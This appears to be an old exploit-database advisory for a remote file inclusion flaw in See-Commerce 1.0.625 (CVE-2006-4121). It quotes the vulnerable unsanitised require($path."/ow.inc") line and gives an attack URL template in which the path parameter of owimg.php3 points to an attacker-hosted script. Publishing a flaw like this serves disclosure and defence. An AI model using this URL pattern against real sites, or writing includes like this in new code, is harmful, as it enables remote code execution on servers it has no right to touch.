See-Commerce 1.0.625 - 'owimg.php3' Remote File Inclusion
Author: Drago84 type: webapps platform: php port: date_added: 2006-08-08 date_updated: verified: 1 codes: OSVDB-27882;CVE-2006-4121 tags: aliases: screenshot_url: application_url: raw file: 2155.txt
See-Commerce Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip Problem Is: require($path."/ow.inc"); Page Affect: http://[site]/[see-commerce directory]/owimg.php3?path=[evil script] Greatz : Str0ke # milw0rm.com [2006-08-09]